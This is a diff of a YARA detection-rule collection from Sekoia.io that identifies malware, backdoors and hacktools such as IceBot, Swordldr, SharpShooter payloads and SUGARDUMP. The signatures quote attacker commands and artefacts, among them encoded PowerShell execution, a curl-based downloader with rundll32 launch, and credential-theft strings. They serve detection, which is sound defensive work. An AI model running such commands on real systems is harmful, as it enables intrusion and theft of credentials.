+		date = "2022-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt31_pakdoor.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "1d60edb577641ce47dc2a8299f8b7f878e37120b192655aaf80d1cde5ee482d2"
-		logic_hash = "ef001e31b34761688f32ec767082d9d7f9fc4e4368d567eb64b66583bcb7fc78"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_earthworm_strings.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0460c62fefc3d594ca758a37fbe1716182ffdca2920fedd32a707f7117702176"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		version = "1.0"
 
 	strings:
-		$s1 = "mv -f %s %s ;chmod 777 %s"
-		$s2 = "GET /plain HTTP/1.1"
-		$s3 = "exc_cmd time out"
-		$s4 = "exc_cmd pipe err"
-		$s5 = { 2e 2f [1-10] 20 20 64 65 6c }
+		$ = "the read url is %s"
+		$ = "--> %3d <-- (close)used tunnel %d , unused tunnel %d"
+		$ = "ssocksd 0.0.0.0:%d <--[%4d usec]--> socks server"
+		$ = "could not create one way tunnel"
 
 	condition:
-		int32be ( 0 ) == 0x7f454c46 and filesize < 800KB and filesize > 400KB and 4 of ( $s* )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xcffaedfe ) and filesize < 100KB and 3 of them
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_9 : FILE
+rule SEKOIA_Spyware_And_Fastfire : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detect the FastFire malware"
 		author = "Sekoia.io"
-		id = "e4283d6e-d829-4f21-ba60-9e6232519e54"
-		date = "2023-02-03"
+		id = "93c0ffd5-faa5-4ead-8848-1c44b459dc29"
+		date = "2022-11-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_sharpshooter_payload_9.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "deb0773e6300ed0f4c099359731812216390017eaf8de678b2a5ed237906f03f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/spyware_and_fastfire.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "2600fc0a8fc6279936decf80256be1fc8cb581a59ef6646fe48b5885e104365e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239153,53 +240004,61 @@ rule SEKOIA_Generic_Sharpshooter_Payload_9 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "shell.Environment(\"Process\").Item(\"COMPLUS_Version\")"
-		$ = "(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)"
-		$ = "DebugPrint Err.Description"
+		$funct1 = {22 00 87 18 70 20 f3 ae 40 00 6e 10 f4 ae 00 00 0c 04 1f 04 16 19 13 00 28 23 6e 20 e3 ae 04 00 12 10 6e 20 e5 ae 04 00 1a 00 25 19 6e 20 ea ae 04 00 28 05 0d 00 6e 10 ef ae 00 00 6e 10 da ae 04 00 6e 10 e1 ae 04 00 0a 00 13 01 c8 00 32 10 20 00 1c 00 ea 17 6e 10 73 ad 00 00 0c 00 22 01 60 18 70 10 5d ae 01 00 1a 02 ff 50 6e 20 69 ae 21 00 6e 10 e1 ae 04 00 0a 04 6e 20 64 ae 41 00 6e 10 72 ae 01 00 0c 04 71 20 1d 09 40 00}
+		$funct2 = {22 00 77 00 1a 01 88 56 70 20 f1 02 10 00 15 01 00 10 6e 20 f4 02 10 00 1a 01 80 8d 6e 20 32 ae 13 00 0a 01 38 01 0b 00 1a 01 25 76 71 10 b3 06 01 00 0c 01 6e 20 22 03 10 00 1a 01 56 61 6e 20 32 ae 13 00 0a 01 38 01 0b 00 1a 01 23 76 71 10 b3 06 01 00 0c 01 6e 20 22 03 10 00 1a 01 55 66 6e 20 32 ae 13 00 0a 03 38 03 0b 00 1a 03 24 76 71 10 b3 06 03 00 0c 03 6e 20 22 03 30 00 13 03 64 00 15 01 00 08 71 40 07 02 32 10 0c 03 11 03}
+		$s0 = "TokenResult{token="
+		$s1 = "[-] Send Resp Code ="
+		$s2 = "/report_token/report_token.php?token="
+		$s3 = "naver"
+		$s4 = "daum"
+		$s5 = "facebook"
 
 	condition:
-		all of them and filesize < 2MB
+		uint32be( 0 ) == 0x6465780A and ( 1 of ( $funct* ) or all of ( $s* ) )
 }
-rule SEKOIA_Apt_Oilrig_Saitama_Backdoor_May2022 : FILE
+
+rule SEKOIA_Icebot_Exported_Function : FILE
 {
 	meta:
-		description = "Detects tje Saitama backdoor"
+		description = "Detects the IceBot RAT used by FIN7 based on the exported function"
 		author = "Sekoia.io"
-		id = "4ea8c27f-c441-4616-a29b-2b5dfdd3bd20"
-		date = "2022-05-13"
+		id = "1a1fb651-6ce3-4751-be23-c27a3d8dabde"
+		date = "2022-01-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_oilrig_saitama_backdoor_may2022.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b3876995fde9c26052c39859684cec05e8c1bc8e2a62946b49ed328e84499dc6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/icebot_exported_function.yar#L4-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c029693f555726d28375717fe459ccf4521d2d63fc7053032bbafd60129848f0"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "5ee5b869689686d9352c73173304627bb424b8d0a8510e6f16726ac84fdec79d"
+		hash2 = "0f76768f65775329d7a0ddb977ea822d992d086ce48a23679cef66e3b4d2f4ed"
+		hash3 = "f06c7f1b91fb2f64e1f38df6eaf2b52a74b16cc958d74c4401fdaf180deb595a"
+		hash4 = "cbed0cf3273ce544a7e4e316d5c8f5e9c9ac6deaefa485a6afad2654fe75ff1e"
 
 	strings:
-		$ = { 7E [4] 7E [4] 59 0A 02 8E 69 06 28 [4] D1 0B 02 16 7E [4] 7E [4] 07 }
-		$ = "systeminfo | findstr" wide
-		$ = "powershell -exec bypass -enc" wide
-		$ = "SendAndReceive : {0}" wide
-		$ = "SleepSecond : Start" wide
+		$a = {cc cc cc 48 89 4c 24 ?? 53 55 56 57 41 54 41 55 41 56 41 57 ?? ?? ?? ?? 33 f6 44 8b ee 48 89 74 24 ?? 8b ee 48 89 b4 24 ?? ?? ?? ?? 44 8b f6 48 89 74 24 ?? 44 8b e6 e8 bf ff ff ff 4c 8b f8 8d 5e ?? b8 ?? ?? ?? ?? 66 41 39 07 75 1b 49 63 57 ?? 48 8d 4a ?? 48 81 f9 ?? ?? ?? ?? 77 0a 42 81 3c 3a ?? ?? ?? ?? 74 05 4c 2b fb eb d5 65 48 8b 04 25 ?? ?? ?? ?? bf ?? ?? ?? ?? 4c 89 bc 24 ?? ?? ?? ?? 48 8b 48 ?? 4c 8b 59 ?? 4c 89 9c 24 ?? ?? ?? ?? 4d 85 db 0f 84 d5 01 00 00 41 b9 ff ff 00 00 49 8b 53 ?? 48 8b c6 45 0f b7 43 ?? 0f b6 0a c1 c8 ?? 80 f9 ?? 72 04 48 83 c0 ?? 48 03 c1 48 03 d3 66 45 03 c1 75 e5 3d ?? ?? ?? ?? 0f 85 d2 00 00 00 49 8b 53 ?? 41 bb ff ff 00 00 48 63 42 ?? 8b b4 10 ?? ?? ?? ?? 44 8b 54 16 ?? 8b 5c 16 ?? 4c 03 d2 48 03 da 45 33 c9 45 8d 79 ?? 45 8b 02 41 8b c9 4c 03 c2 41 8a 00 4d 03 c7 c1 c9 ?? 0f be c0 03 c8 41 8a 00 84 c0 75 ee 81 f9 ?? ?? ?? ?? 74 10 81 f9 ?? ?? ?? ?? 74 08 81 f9 ?? ?? ?? ?? 75 44 44 8b 4c 16 ?? 44 0f b7 03 4c 03 ca 81 f9 ?? ?? ?? ?? 75 09 47 8b 2c 81 4c 03 ea eb 20 81 f9 ?? ?? ?? ?? 75 09 43 8b 2c 81 48 03 ea eb 0f 81 f9 ?? ?? ?? ?? 75 07 47 8b 34 81 4c 03 f2 66 41 03 fb 45 33 c9 49 83 c2 ?? 48 83 c3 ?? 66 85 ff 0f 85 75 ff ff ff 4c 8b 9c 24 ?? ?? ?? ?? 33 f6 48 89 ac 24 ?? ?? ?? ?? 4c 89 6c 24 ?? e9 8d 00 00 00 3d ?? ?? ?? ?? 0f 85 90 00 00 00 4d 8b 43 ?? 41 bf ?? ?? ?? ?? 41 0f b7 ff bd ff ff 00 00 49 63 40 ?? 42 8b 9c 00 ?? ?? ?? ?? 46 8b 4c 03 ?? 46 8b 54 03 ?? 4d 03 c8 4d 03 d0 41 8b 11 8b ce 49 03 d0 8a 02 49 03 d7 c1 c9 ?? 0f be c0 03 c8 8a 02 84 c0 75 ef 81 f9 ?? ?? ?? ?? 75 16 42 8b 4c 03 ?? 41 0f b7 12 49 03 c8 44 8b 24 91 4d 03 e0 66 03 fd 49 83 c1 ?? 49 83 c2 ?? 66 85 ff 75 ba 48 8b ac 24 ?? ?? ?? ?? 4c 89 64 24 ?? 41 b9 ff ff 00 00 bf ?? ?? ?? ?? 49 8b df 4d 85 ed 74 0f 48 85 ed 74 0a 4d 85 f6 74 05 4d 85 e4 75 14 4d 8b 1b 4c 89 9c 24 ?? ?? ?? ?? 4d 85 db 0f 85 39 fe ff ff 4c 8b bc 24 ?? ?? ?? ?? 49 63 6f ?? 33 c9 49 03 ef 89 b4 24 ?? ?? ?? ?? 41 b8 00 ?? ?? ?? 48 89 6c 24 ?? 4c 8b e6 44 8d 49 ?? 8b 55 ?? 41 ff d6 44 0f b7 45 ?? 48 8b f8 44 0f b7 55 ?? 49 83 c0 ?? 4d 85 d2 74 4f 4c 03 c5 41 8b 00 4c 2b d3 45 8b 48 ?? 41 8b 48 ?? 48 03 cf 49 8d 14 07 41 03 c1 89 84 24 ?? ?? ?? ?? 48 8b c1 48 2b c2 4d 85 e4 49 0f 45 c4 4c 8b e0 4d 85 c9 74 0f 8a 02 48 03 d3 88 01 48 03 cb 4c 2b cb 75 f1 49 83 c0 ?? 4d 85 d2 75 b4 8b 85 ?? ?? ?? ?? 41 be ?? ?? ?? ?? 85 c0 0f 84 e8 00 00 00 48 8d 1c 07 8b 43 ?? 85 c0 0f 84 d9 00 00 00 48 8b ac 24 ?? ?? ?? ?? 8b c8 48 03 cf 41 ff d5 44 8b 7b ?? 33 c9 8b 33 4c 03 ff 48 03 f7 4c 8b e8 49 39 0f 74 7d 48 85 f6 74 31 48 39 0e 7d 2c 49 63 45 ?? 0f b7 16 42 8b 8c 28 ?? ?? ?? ?? 42 8b 44 29 ?? 42 8b 4c 29 ?? 48 2b d0 49 03 cd 8b 04 91 49 03 c5 49 89 07 33 c9 eb 2a 4d 8b 37 49 8b cd 49 83 c6 ?? 4c 03 f7 49 8b d6 ff d5 33 c9 49 89 07 41 38 0e 74 0e 8d 41 ?? 41 88 0e 4c 03 f0 41 38 0e 75 f5 49 83 c7 ?? 48 8d 46 ?? 48 85 f6 48 0f 44 c6 48 8b f0 49 39 0f 75 89 41 be ?? ?? ?? ?? 8b 43 ?? 48 03 c7 33 f6 eb 06 40 88 30 49 03 c6 40 38 30 75 f5 8b 43 ?? 48 83 c3 ?? 4c 8b 6c 24 ?? 85 c0 0f 85 3c ff ff ff 48 8b 6c 24 ?? 4c 8b bc 24 ?? ?? ?? ?? 4c 8b cf 4c 2b 4d ?? 39 b5 ?? ?? ?? ?? 0f 84 b5 00 00 00 8b 95 ?? ?? ?? ?? 48 03 d7 8b 42 ?? 85 c0 0f 84 a1 00 00 00 41 bf ?? ?? ?? ?? bb ff ?? ?? ?? 45 8d 6f ?? 44 8b 02 4c 8d 5a ?? 44 8b d0 4c 03 c7 49 83 ea ?? 49 d1 ea 74 62 41 be ?? ?? ?? ?? 41 0f b7 0b 4d 2b d6 0f b7 c1 66 c1 e8 ?? 66 83 f8 ?? 75 09 48 23 cb 4e 01 0c 01 eb 34 66 41 3b c5 75 09 48 23 cb 46 01 0c 01 eb 25 66 41 3b c6 75 11 48 23 cb 49 8b c1 48 c1 e8 ?? 66 42 01 04 01 eb 0e 66 41 3b c7 75 08 48 23 cb 66 46 01 0c 01 4d 03 df 4d 85 d2 75 a7 8b 42 ?? 48 03 d0 8b 42 ?? 85 c0 0f 85 7a ff ff ff 4c 8b bc 24 ?? ?? ?? ?? 44 8d 70 ?? 8b 5d ?? 45 33 c0 33 d2 48 83 c9 ff 48 03 df ff 54 24 ?? e8 21 fb ff ff 4d 85 e4 74 13 48 85 c0 74 0e 4a 8d 0c 20 4c 8b e6 e8 67 00 00 00 eb 3b 8b 94 24 ?? ?? ?? ?? c1 ea ?? 89 b4 24 ?? ?? ?? ?? eb 1d 48 63 84 24 ?? ?? ?? ?? 41 89 34 87 8b 84 24 ?? ?? ?? ?? 41 03 c6 89 84 24 ?? ?? ?? ?? 8b 84 24 ?? ?? ?? ?? 3b c2 72 d8 4c 8b 84 24 ?? ?? ?? ?? ba ?? ?? ?? ?? 48 8b cf ff d3 49 8d 04 3c ?? ?? ?? ?? 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 2 of them
+		uint16( 0 ) == 0x5A4D and $a or pe.imphash ( ) == "37af5cd8fc35f39f0815827f7b80b304" or hash.md5 ( pe.rich_signature.clear_data ) == "b857cf76a54ce175c225eaaae66547a2"
 }
-rule SEKOIA_Hacktool_Impacket_Compiled_Binary : FILE
+rule SEKOIA_Malware_Swordldr : FILE
 {
 	meta:
-		description = "Detects generic PE embbeding impacket"
+		description = "Detects Swordldr. Maybe chunk_1 is too restrictive"
 		author = "Sekoia.io"
-		id = "43936dcc-0d74-43dd-996a-c27a28cef283"
-		date = "2022-02-28"
+		id = "4068c007-50f4-4913-a352-4a40dd4e452b"
+		date = "2024-09-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_impacket_compiled_binary.yar#L1-L36"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "133f9d0103774701894ea884bc2c52840b405fa21acb9ebab615816ec411b0bf"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malware_swordldr.yar#L1-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "d0cc758082e303275cbb8cd6b2048eff"
+		hash = "7aa57da44718cd88f7d37b33a5d3ad74"
+		logic_hash = "9e408181b9122925c0ff9efdaed688e659596b58b9108c0f280d9bc1624d73cb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239207,42 +240066,34 @@ rule SEKOIA_Hacktool_Impacket_Compiled_Binary : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$i1 = "impacket.crypto" fullword
-		$i2 = "impacket.dcerpc" fullword
-		$i3 = "impacket.ese" fullword
-		$i4 = "impacket.hresult_errors" fullword
-		$i5 = "impacket.krb5" fullword
-		$i6 = "impacket.nmb" fullword
-		$i7 = "impacket.nt_errors" fullword
-		$i8 = "impacket.ntlm" fullword
-		$i9 = "impacket.smb" fullword
-		$i10 = "impacket.smb3" fullword
-		$i11 = "impacket.smb3structs" fullword
-		$i12 = "impacket.smbconnection" fullword
-		$i13 = "impacket.spnego" fullword
-		$i14 = "impacket.structure" fullword
-		$i15 = "impacket.system_errors" fullword
-		$i16 = "impacket.tds" fullword
-		$i17 = "impacket.uuid" fullword
-		$i18 = "impacket.version" fullword
-		$i19 = "impacket.winregistry" fullword
-		$py = "PYZ-00.pyz"
+		$ = { CC CC CC CC B0 01 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 02 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 03 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 04 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 05 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 06 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 07 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 08 C3 CC CC CC CC }
+		$ = { CC CC CC CC B0 09 C3 CC CC CC CC }
+		$chunk_1 = {
+        48 63 44 24 40 44 8B 44 86 04 48 63 44 24 40 45 23 ?? 45 03 C0 8B 54 86 04 48 63 44 24 40 41 2B D0 41 03 ?? 89 54 86 04
+        }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 1MB and 3 of ( $i* ) and $py
+		uint16be( 0 ) == 0x4d5a and 4 of them and #chunk_1 > 5
 }
-rule SEKOIA_Apt_Oilrig_Maliciousdocument_May2022 : FILE
+rule SEKOIA_Tool_Sharpsecdump : FILE
 {
 	meta:
-		description = "Detects OilRig Malicious Document"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "cb4ab310-e24c-4edc-8804-0c49c30124fb"
-		date = "2022-05-13"
+		id = "359bf48b-81c8-4d12-ac02-777d4865411a"
+		date = "2023-06-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_oilrig_maliciousdocument_may2022.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d4aa960d4471ddf66ec6f98a5c883177763771ba9960b749509311a05384d9a7"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_sharpsecdump.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f183069d843767daa97bc81385e5e1b3a19c556f8171f28f8806aebe7a226176"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239250,29 +240101,26 @@ rule SEKOIA_Apt_Oilrig_Maliciousdocument_May2022 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "<LogonType>InteractiveToken</LogonType>"
-		$s2 = "Select * From Win32_PingStatus Where Address"
-		$s3 = "She@et1"
-		$s4 = "_VBA_PROJECT" wide
-		$s5 = "This program cannot be run in DOS mode." base64
-		$s6 = ".Agent.pdb" base64
-		$s7 = "GetAgentID" base64
+		$s1 = "SharpSecDump"
+		$s2 = "e2fdd6cc-9886-456c-9021-ee2c47cf67b7"
+		$s3 = "Md4Hash2"
+		$s4 = "RidToKey"
 
 	condition:
-		uint32be( 0 ) == 0xD0CF11E0 and 3 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
 }
-rule SEKOIA_Backdoor_Sandman_Strings : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_6 : FILE
 {
 	meta:
-		description = "Detect the Sandman backdoor based on strings"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "7bac7a1e-7d4a-4410-9ad4-1c85beb6faaf"
-		date = "2022-08-23"
+		id = "53506a3e-b0d8-4a1e-88d9-485e829f25cb"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_sandman_strings.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "74ee1b73532d9050d5ed7ea0bed158322288a2f5b65255804ebf10dc1a4ea55b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_sharpshooter_payload_6.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "38919408d2d0a9f51822302f4f821bf5776f119bf0d1b54b71b1040c7ad59da5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239280,85 +240128,81 @@ rule SEKOIA_Backdoor_Sandman_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "e9f7c24c-879d-49f2-b9bf-2477dc28e2ee"
-		$s2 = "System.Net.Sockets"
-		$s3 = "ntpServer"
-		$s4 = "payloadUrl"
-		$s5 = "keepRunning"
-		$s6 = "payloadSize"
-		$s7 = "defaultNtpMessageSize"
-		$s8 = "InjectShellcode"
+		$ = "function ${rc4Function}(r,o){for("
+		$ = "function ${b64AndRC4Function}(r,o){var"
+		$ = "Real-Time Scanning: No threats detected"
+		$ = "Please wait while your file is being downloaded..."
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 7 of them or $s1
+		3 of them and filesize < 2MB
 }
-rule SEKOIA_Downloader_Win_Curl_Agent
+rule SEKOIA_Apt_Sugardump_Credentials_Stealer_Smtp : FILE
 {
 	meta:
-		description = "Detect the downloader used by Bluenoroff to install it CurlAgent"
+		description = "Detects SUGARDUMP SMTP version"
 		author = "Sekoia.io"
-		id = "ddeb2d8f-1b10-4a33-b768-d19412e8551a"
-		date = "2023-05-02"
+		id = "bf028ebc-bfaa-45b3-9a3f-8949a5efbb73"
+		date = "2022-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_win_curl_agent.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b34375ec051c969adec82901c1130b0a389261912559d70c652ee826cb2d4107"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sugardump_credentials_stealer_smtp.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1f423f38ff323e67667e35af5603e608cba6eaf8d98633467b0292c5f81c8d1c"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%s\\marcoor.dll" wide
-		$ = "curl -A cur1-agent -L %s -s -d dl"
-		$ = "curl -A cur1-agent -L %s -s -d da"
-		$ = "cmd /c timeout /t 10 & rundll32 \"%s\" #1" wide
-		$ = "cmd /c timeout /t 10 & Del /f /q \"%s\" & attrib -s -h \"%s\" & rundll32 \"%s\" #1" wide
+		$ = "<<<<<<<< ------ Passwords Total: {0} --------- >>>>>>>>" wide
+		$ = "Url = {0} , Count = {1}" wide
+		$ = "smtp." wide
+		$ = "encrypted_key\":\"(.*?)\"" wide
 
 	condition:
-		3 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_12 : FILE
+rule SEKOIA_Rat_Win_Reverserat
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detect SideCopy's ReverseRAT v3 observed in January 2023"
 		author = "Sekoia.io"
-		id = "b69186cf-9825-4d90-be20-7caa9e7de61f"
-		date = "2023-02-03"
+		id = "8fbd395f-f44e-46d5-a942-7c7e88f37127"
+		date = "2023-02-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_sharpshooter_payload_12.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5c9692337c0dd533c7e49bd3850feedad93b256bc2fba45af6121f50ad83f4cc"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_reverserat.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "b277a824b2671f40298ce03586a2ccc0fca2a081a66230c57a3060c2028f13ee"
+		hash = "8b87459483248d7b95424cd52b7d4f3031e89c6644adc2e167556e071d9ec3aa"
+		logic_hash = "13a5a916e084996ce4d7840581250f7630652acdcad0f66e21763cb3a9cbccc3"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "ms.Write(ba, 0, (length / 4) * 3);"
-		$ = "var serialized_obj = "
-		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);"
-		$ = "var sc ="
+		$ = "SELECT maxclockspeed,  datawidth, name, manufacturer FROM Win32_Processor" wide
+		$ = "select * from Win32_PhysicalMemory" wide
+		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide
 
 	condition:
-		all of them and filesize < 2MB
+		all of them
 }
-rule SEKOIA_Tool_3Proxy_Strings : FILE
+rule SEKOIA_Hacktool_Mimikat_Ssp_Strings : FILE
 {
 	meta:
-		description = "Detects 3proxy based on strings"
+		description = "Detects mimikat_ssp"
 		author = "Sekoia.io"
-		id = "daf6cd97-8033-4bfd-88b5-41c06eb417b0"
-		date = "2024-03-14"
+		id = "33b3620f-e02d-4d29-adcc-fea3b49ab780"
+		date = "2023-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_3proxy_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f1d9bea9975af9bfa3f1a8cbf2c1d65fe1d39f303d5dbe6131887653cbbe7021"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_mimikat_ssp_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "06325bf495963db90b14fb16a5f3eafda9e4554f753d04405af51c6041a9b166"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239366,81 +240210,56 @@ rule SEKOIA_Tool_3Proxy_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "of 3proxy-"
-		$ = "-pPORT - service port to accept connections"
+		$ = "[*] Building RPC packet" ascii
+		$ = "[*] Connecting to lsasspirpc RPC service" ascii
+		$ = "[*] Sending SspirConnectRpc call" ascii
+		$ = "[*] Sending SspirCallRpc call" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 500KB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
 }
-rule SEKOIA_Apt_37_Chinotto : FILE
+rule SEKOIA_Implant_Mul_Alchimist : FILE
 {
 	meta:
-		description = "Detects obfuscation and string of APT37 stealer"
+		description = "Detect the Alchimist implant based on strings"
 		author = "Sekoia.io"
-		id = "eff8fd11-dc7a-4011-b083-181d0cca8790"
-		date = "2023-02-27"
+		id = "66330cc6-a7da-4717-9977-0cede48f46f5"
+		date = "2022-10-18"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_37_chinotto.yar#L1-L50"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a721f102b4c9568379649f8004fa4eb460240145ab829d8ce3740dafb52d13c8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_mul_alchimist.yar#L1-L21"
